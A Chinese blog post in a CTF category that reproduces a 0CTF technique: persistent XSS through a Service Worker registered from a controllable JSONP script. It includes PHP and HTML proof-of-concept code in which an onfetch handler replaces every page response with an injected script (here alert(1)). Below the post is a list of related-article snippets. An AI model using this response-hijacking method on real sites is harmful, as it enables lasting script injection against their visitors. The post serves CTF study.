如何利用/防禦 Service Worker

最新推荐文章于 2024-08-02 16:40:33 发布
最新推荐文章于 2024-08-02 16:40:33 发布
阅读量196 收藏
点赞数
分类专栏: CTF

https://hk.saowen.com/a/02abd976c3348e09e374b24be8c4a94ae2dde23ddfac6f3dc63025237b19a96c

上午看到相关0ctf里有相关wp,尝试自己复现


理解:

需要能控制 .js 文件或者 jsonp 弱验证,危害是,如果serviceworker注册成功

那么同目录下文件都能被控制,而且清空缓存才可以结束XSS


复现:

jsonp.php (省事,于是直接echo了js代码)

<?php
header('Content-type: application/javascript');
echo "onfetch = function(e) {
	body = '<script>alert(1)</script>' ; 
	init = { headers : { 'content-type' : 'text/html' } } ; 
	e.respondWith(
		new Response(body,init)
	);
}";
?>

index.php (存在xss的地方)

<!DOCTYPE html>
<html>
<head>
	<title></title>
	<meta charset="utf-8">
</head>
<body>

<script>
if ('serviceWorker' in navigator) {
 navigator.serviceWorker.register('http://localhost/ServiceWorker/1.php')
 .then(function(registration) {
 console.log('ServiceWorker registration successful with scope: ', registration.scope);
 })
};

</script>

</body>

</html>

访问index.php之后,console不报错就是注册成功,再次刷新即可发现弹窗。

PD_3569
关注
专栏目录
ctf xss利用_TCTF/0CTF2018 XSS Writeup
weixin_29923451的博客
01-14 523
作者:LoRexxar'@知道创宇404实验室刚刚4月过去的TCTF/0CTF2018一如既往的给了我们惊喜,其中最大的惊喜莫过于多道xss中Bypass CSP的题目,其中有很多应用于现代网站的防御思路。其中bl0g提及了通过变量覆盖来调用已有代码动态插入Script标签绕过strict-dynamicCSP的利用方式。h4xors.club2则是通过Script Gadgets和postmes...
低成本防御网站 DDOS 攻击
wulanlin的博客
01-06 203
前言 传统的 DDOS 防御通常使用“硬抗”的方式,导致开销很大,而且有时效果并不好。例如使用 DNS 切换故障 IP 的方案,由于域名会受到缓存等因素的影响通常有分钟级延时,前端难以快速生效。例如使用 CDN 服务,虽可抵挡大多网络层攻击,但对应用层攻击却常有疏漏,攻击者可通过恶意请求消耗流量、日志存储等费用,导致欠费停止服务。例如购买流量清洗等服务,虽然效果不错但费用十分昂贵。 今天分享一种超低成本的网站 DDOS 防御方案 —— 不使用任何后端防御服务,纯前端实现!当然效果也非常极端:如果用户之前
前端性能优化方案(gz,serviceWorker
小程子的博客
11-18 528
一、问题场景 1、在网络不稳定的情况下,页面访问速度不稳定 2、在网络稳定、前端资源较大的情况下,页面访问速度较慢 二、调研思路 1、在首次访问页面时,静态资源需要从服务器拉取;那如何做到除首次访问,不需要从服务器再去拉取静态资源; 2、在架构项目中(vue,react),chunk-vendors.js体积的大小决定这首屏渲染的速度;如何能做到减少chunk-vendors.js的体积或者提升它的加载速度; 三、解决方案 1、在架构项目解决加载和文件体积; 1、路由懒加载方式; 根据访问的路由去加载路由
Service Worker
肖的博客
08-27 380
基本特性 不能直接访问/操作 DOM(只能使用特定的 API:Promise、Fetch API、Cache API) 需要时直接唤醒,不需要时自动休眠 离线缓存内容开发者可控 一旦被安装则永远存活,除非手动卸载 必须在 HTTPS 环境下工作(本地环境 localhost 除外) 广泛使用了 Promise 使用 生命周期相关知识 install 阶段缓存文件列表 activate 阶...
Service Worker 入门 - PWA 强依赖于 Service Worker
张同光 (Tongguang Zhang):Hello everyone !
12-19 5726
Service Worker 入门 - PWA 强依赖于 Service Worker
XSS漏洞原理和利用
热门推荐
VictorZhang
08-09 1万+
XSS漏洞原理和利用 1.XSS介绍及原理 XSS又叫CSS(Cross Site Script),跨站脚本攻击。它指的是恶意攻击者往Web页面 里插入恶意JS代码,当用户浏览该页之时,嵌入其中Web里面的JS代码会被执行,从而 达到恶意的特殊目的。 利用我们所知道的各种黑魔法,向Web页面插入JS代码,让JS代码可以被浏览器执行, 访问该页面的用户则被攻击。 XSS漏洞分类 1.反射型 非存储型...
HTTP Flood攻击与防御原理
zhoupenghui168的博客
04-07 4271
HTTP Flood攻击与防御原理,以及防御方法
CORS配置漏洞/jsonp劫持
weixin_71093833的博客
08-02 2039
cors漏洞简单摘要
nginx防御简单CC攻击的方法
IChen.的博客
07-03 1371
简介: CC攻击可以归为DDoS攻击的一种。他们之间都原理都是一样的,即发送大量的请求数据来导致服务器拒绝服务,是一种连接攻击。CC攻击又可分为代理CC攻击,和肉鸡CC攻击。代理CC攻击是黑客借助代理服务器生成指向受害主机的合法网页请求,实现DOS,和伪装就叫:cc(ChallengeCollapsar)。而肉鸡CC攻击是黑客使用CC攻击软件,控制大量肉鸡,发动攻击,相比来后者比前者更难防御。因为肉鸡可以模拟正常用户访问网站的请求。伪造成合法数据包。防御CC攻击可以通过多种方法,禁止网站代理访问,尽量将网站
什么是ddos攻击,如何低成本防御ddos攻击?
A1_3_9_7的博客
12-25 1931
DDoS是Distributed Denial of Service的缩写,即分布式拒绝服务。
星球防御网页版HTML5源码
03-19
还有可能利用Service Worker实现离线缓存,即使在网络不稳定的情况下,玩家也能继续游戏。 总的来说,“星球防御”HTML5网页版源码展示了HTML5、CSS3和JavaScript在游戏开发中的强大能力。通过分析源码,我们可以...
awesome-cloudflare::sun_behind_cloud:精选的Cloudflare工作人员食谱,开源项目,指南,博客和其他资源的清单
02-01
- **Service Worker**: Service Worker是Web平台的一个技术,可以在浏览器后台运行,使得开发者能够实现离线缓存、推送通知等功能。Cloudflare Workers与Service Worker类似,但部署在全球的边缘节点上,可以更快速...
Nginx教程 防御ddos,用户访问控制,限流.zip
01-09
本教程将围绕如何利用Nginx进行DDoS防御、用户访问控制以及流量和并发连接数限制展开。 **一、防御DDoS攻击** DDoS(Distributed Denial of Service)分布式拒绝服务攻击是一种常见的网络安全威胁,通过大量恶意...
基于SpringBoot仿天猫购物系统.zip(毕设&课设&实训&大作业&竞赛&项目)
09-20
项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全领域),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助。 【资源内容】:包含完整源码+工程文件+说明(如有)等。答辩评审平均分达到96分,放心下载使用!可轻松复现,设计报告也可借鉴此项目,该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 【提供帮助】:有任何使用问题欢迎随时与我联系,我会及时解答解惑,提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【项目价值】:可用在相关项目设计中,皆可应用在项目、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面,可借鉴此优质项目实现复刻,设计报告也可借鉴此项目,也可基于此项目来扩展开发出更多功能 下载后请首先打开README文件(如有),项目工程可直接复现复刻,如果基础还行,也可在此程序基础上进行修改,以实现其它功能。供开源学习/技术交流/学习参考,勿用于商业用途。质量优质,放心下载使用。
Python网络爬虫与推荐算法新闻推荐平台(毕设&课设&实训&大作业&竞赛&项目)
最新发布
09-20
Python网络爬虫与推荐算法新闻推荐平台:网络爬虫:通过Python实现新浪新闻的爬取,可爬取新闻页面上的标题、文本、图片、视频链接(保留排版) 推荐算法:权重衰减+标签推荐+区域推荐+热点推荐.zip项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全领域),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助。 【资源内容】:包含完整源码+工程文件+说明(如有)等。答辩评审平均分达到96分,放心下载使用!可轻松复现,设计报告也可借鉴此项目,该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 【提供帮助】:有任何使用问题欢迎随时与我联系,我会及时解答解惑,提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【项目价值】:可用在相关项目设计中,皆可应用在项目、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面,可借鉴此优质项目实现复刻,设计报告也可借鉴此项目,也可基于此项目来扩展开发出更多功能 下载后请首先打开README文件(如有),项目工程可直接复现复刻,如果基础还行,也可在此程序基础上进行修改,以实现其它功能。供开源学习/技术交流/学习参考,勿用于商业用途。质量优质,放心下载使用。
THUCNews数据集
09-20
THUCNews数据集
Q音:Vue3+Pinia+Vue Router4+Vant4的移动端仿抖音短视频项目.zip(毕设&课设&实训&大作业&竞赛&
09-20
项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全领域),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助。 【资源内容】:包含完整源码+工程文件+说明(如有)等。答辩评审平均分达到96分,放心下载使用!可轻松复现,设计报告也可借鉴此项目,该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 【提供帮助】:有任何使用问题欢迎随时与我联系,我会及时解答解惑,提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【项目价值】:可用在相关项目设计中,皆可应用在项目、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面,可借鉴此优质项目实现复刻,设计报告也可借鉴此项目,也可基于此项目来扩展开发出更多功能 下载后请首先打开README文件(如有),项目工程可直接复现复刻,如果基础还行,也可在此程序基础上进行修改,以实现其它功能。供开源学习/技术交流/学习参考,勿用于商业用途。质量优质,放心下载使用。
undo-log.sql
09-20
undo-log.sql
vue+SpringBoot730基于JavaScript和vue的商城管理系统设计与实现java毕业设计源码含论文.rar
09-20
jdk版本:jdk1.8+ 前端:vue.js+ElementUI 开发工具:IDEA 或者eclipse都支持 编程语言: java 框架支持:springboot 数据库: mysql 版本不限 数据库工具:Navicat/SQLyog都可以 详细技术:java+springboot+vue+MYSQL+MAVEN 前端采用的Vue框架,后端采用java语言,sprinboot框架,mybatis操作数据源,使用软件:idea,eclipse、MySQL。完成了用户登录管理等模块的设计与实现。完成了系统数据库的设计,并基于MySQL数据库管理系统
service worker
07-27
Service Worker是一种在Web浏览器背后运行的脚本,它可以独立于Web页面进行操作。它是一个浏览器功能,允许开发人员将一些任务(例如网络请求、缓存文件等)在后台线程中运行,这样可以提供更好的性能和离线体验。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值